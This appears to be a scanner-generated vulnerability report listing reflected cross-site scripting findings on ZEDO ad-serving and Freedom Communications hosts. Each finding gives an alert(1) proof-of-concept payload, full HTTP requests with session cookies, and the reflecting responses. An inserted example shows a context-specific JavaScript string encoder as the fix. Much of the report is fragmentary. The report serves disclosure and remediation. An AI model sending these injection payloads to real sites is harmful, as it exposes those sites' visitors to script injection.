The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98aa1'%3balert(1)//71dd49f8f74 was submitted in the $ parameter. This input was echoed as 98aa1';alert(1)//71dd49f8f74 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=98aa1'%3balert(1)//71dd49f8f74&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:98aa1';alert(1)//71dd49f8f74;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:59 GMT
Connection: close
Content-Length: 2512

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',98aa1';alert(1)//71dd49f8f74';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,98aa1';alert(1)//71dd49f8f74;z="+Math.random();}
1.91. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://c7.zedo.com
Path: /bar/v16-401/c5/jsc/fmr.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce34c'-alert(1)-'2c607e7cd20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?ce34c'-alert(1)-'2c607e7cd20=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=1220,175,9:1220,175,14; ZFFAbh=749B826,20|1483_759#365; FFad=1:1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 986
Content-Type: application/x-javascript
Set-Cookie: FFad=0:1:1;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,175,9:1220,175,14;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=403
Expires: Thu, 03 Feb 2011 16:18:54 GMT
Date: Thu, 03 Feb 2011 16:12:11 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7cb1'%3balert(1)//8a1d92bd133 was submitted in the q parameter. This input was echoed as c7cb1';alert(1)//8a1d92bd133 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=c7cb1'%3balert(1)//8a1d92bd133&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=126
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:58 GMT
Connection: close
Content-Length: 2509
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='c7cb1';alert(1)//8a1d92bd133';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=c7cb1';alert(1)//8a1d92bd133;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2059a"%3balert(1)//3c744e65e36 was submitted in the q parameter. This input was echoed as 2059a";alert(1)//3c744e65e36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=2059a"%3balert(1)//3c744e65e36&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=126
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:58 GMT
Connection: close
Content-Length: 2509
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='2059a";alert(1)//3c744e65e36';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=2059a";alert(1)//3c744e65e36;z="+Math.random();}
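Worked example, added for this write-up rather than taken from ZEDO's fmr.js: the two q reflections above are rebuilt with plain concatenation next to a version that encodes for the JavaScript-string context, and each output is compiled and run with alert() stubbed so that the break-out is observed rather than assumed. The zzPat and zzStr names come from the response; the server-side template shape is an assumption.

```javascript
// Added example, not ZEDO's code: the fmr.js templates are reconstructed
// from the response above. The variable names are real; the server-side
// concatenation is an assumption about how they were produced.

// Vulnerable: the q parameter is pasted into a single-quoted literal
// (zzPat) and into a double-quoted literal (zzStr) without encoding.
function renderVulnerable(q) {
  return "var zzPat='" + q + "';" +
         'var zzStr="q=' + q + ';z="+Math.random();';
}

// Encoder for the JavaScript-string context. Everything outside a small
// allow-list becomes a \xHH or \uHHHH escape, which a JS lexer turns back
// into the same character inside the literal: quotes, backslash, the "/"
// and "*" of comment syntax, "<" and ">" (so "</script>" cannot close an
// enclosing tag) and the line terminators including U+2028/U+2029.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 _.,:;-]/g, (ch) => {
    const code = ch.charCodeAt(0);           // one escape per UTF-16 unit
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Hardened: the same templates, with the value encoded once for the
// context it lands in.
function renderHardened(q) {
  const safe = encodeForJsString(q);
  return "var zzPat='" + safe + "';" +
         'var zzStr="q=' + safe + ';z="+Math.random();';
}

// Oracle: compile the generated script and run it with alert() replaced by
// a recorder. Returns true only if the injected alert(1) actually executed.
function alertFires(script) {
  let fired = false;
  try {
    new Function('alert', script)(() => { fired = true; });
  } catch (e) {
    return false;                            // syntax error: nothing ran
  }
  return fired;
}

// The encoder must be lossless: evaluating the encoded literal yields the
// original value, so legitimate q values still reach zzPat unchanged.
function roundTrips(s) {
  return new Function('return "' + encodeForJsString(s) + '";')() === s;
}

// The two payloads from the report.
const PAYLOADS = [
  "c7cb1';alert(1)//8a1d92bd133",          // breaks the single-quoted zzPat
  '2059a";alert(1)//3c744e65e36',          // breaks the double-quoted zzStr
];

function demoStrings() {
  return PAYLOADS.map((p) => ({
    payload: p,
    vulnerable: alertFires(renderVulnerable(p)),
    hardened: alertFires(renderHardened(p)),
    lossless: roundTrips(p),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(demoStrings());
}
```

The encoder is context-specific: it is correct only for data that lands inside a JavaScript string literal, not for data placed outside quotes, inside a comment, or in an HTML attribute. It also shows why HTML entity encoding is the wrong tool for a standalone .js response: &quot; inside the literal is just six characters to the JavaScript lexer, while a raw quote still closes it.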
The value of the CMP request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87dce'%3balert(1)//cd49a21da3a was submitted in the CMP parameter. This input was echoed as 87dce';alert(1)//cd49a21da3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the css request parameter is copied into the HTML document as plain text between tags. The payload 8d4ab<script>alert(1)</script>26bbc880e6b was submitted in the css parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site8d4ab<script>alert(1)</script>26bbc880e6b&scode=ocregister HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:46 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 19:04:46 GMT
ETag: "3e96ae5b9a43fcda3ef515d03304a9d6-80952"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 19:04:46 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/css
Content-Length: 80952
/* Reset styles for browser compatibility */ body, th, td, p, div { font-family:Arial, Helvetica, sans-serif; } html,ul,ol,li,h1,h2,h3 ...[SNIP]...
1.96. http://common.cdn.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://common.cdn.onset.freedom.com
Path:
/tools/load.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c071b<script>alert(1)</script>68b91996e9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister&c071b<script>alert(1)</script>68b91996e9f=1 HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:50 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 19:04:50 GMT
ETag: "c833a993b4a7a934d84484ad93124520-86888"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 19:04:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/css
Content-Length: 86888
The value of the scode request parameter is copied into the HTML document as plain text between tags. The payload 8d317<script>alert(1)</script>6d5518f0373 was submitted in the scode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister8d317<script>alert(1)</script>6d5518f0373 HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:47 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 19:04:49 GMT
ETag: "63029f1bf18ce33fe44a9bdae196c917-22441"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 19:04:47 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/css
Content-Length: 22441
/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister8d317<script>alert(1)</script>6d5518f0373 */ /*generic freedom site styles, take layout.css styles and define fonts, background images, etc */
/* define page areas */ body { font-family: Arial, Helvetica, sans-serif; font-size: 100%; ...[SNIP]...
The value of the ctype request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1014d"%3balert(1)//21a83927387 was submitted in the ctype parameter. This input was echoed as 1014d";alert(1)//21a83927387 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.com&ctype=error1014d"%3balert(1)//21a83927387&cname=&shier=business|realestate|blogs|mortgage&ghier=blogs HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:44 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n19), ms iad-agg-n19 ( sfo-agg-n1), ms sfo-agg-n1 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Thu, 03 Feb 2011 20:54:45 GMT
Age: 0
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28742
var fiChildSAccount="fiocregister";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */
...[SNIP]... rn new s_c(un,pg,ss)}else s=s_c2f(c);return s(un,pg,ss)}
The value of the domain request parameter is copied into a JavaScript inline comment. The payload d8ddc*/alert(1)//26af18f6098 was submitted in the domain parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.comd8ddc*/alert(1)//26af18f6098&ctype=error&cname=&shier=business|realestate|blogs|mortgage&ghier=blogs HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:41 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n7), ms iad-agg-n7 ( sfo-agg-n28), ms sfo-agg-n28 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Thu, 03 Feb 2011 20:54:41 GMT
Age: 0
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28807
var fiChildSAccount="fiocregister";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */
/** referer=http://mortgage.ocregister.com/feeda71cd%22%3e%3cscript%3ealert(1)%3c/script%3e1f35e8c0ea2/ **/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() ...[SNIP]...
The value of the domain request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9298"%3balert(1)//3579af22c1e was submitted in the domain parameter. This input was echoed as e9298";alert(1)//3579af22c1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.come9298"%3balert(1)//3579af22c1e&ctype=error&cname=&shier=business|realestate|blogs|mortgage&ghier=blogs HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:40 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n5), ms iad-agg-n5 ( sfo-agg-n34), ms sfo-agg-n34 ( origin)
Cache-Control: max-age=7200
Expires: Thu, 03 Feb 2011 20:54:40 GMT
Age: 0
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28807
var fiChildSAccount="fiocregister";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */
...[SNIP]... <0){eval(c);return new s_c(un,pg,ss)}else s=s_c2f(c);return s(un,pg,ss)}
The value of the ghier request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aca8c"%3b4150865a2c4 was submitted in the ghier parameter. This input was echoed as aca8c";4150865a2c4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.com&ctype=error&cname=&shier=business|realestate|blogs|mortgage&ghier=blogsaca8c"%3b4150865a2c4 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:55:05 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n28), ms iad-agg-n28 ( sfo-agg-n7), ms sfo-agg-n7 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Thu, 03 Feb 2011 20:55:05 GMT
Age: 0
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28761
var fiChildSAccount="fiocregister";
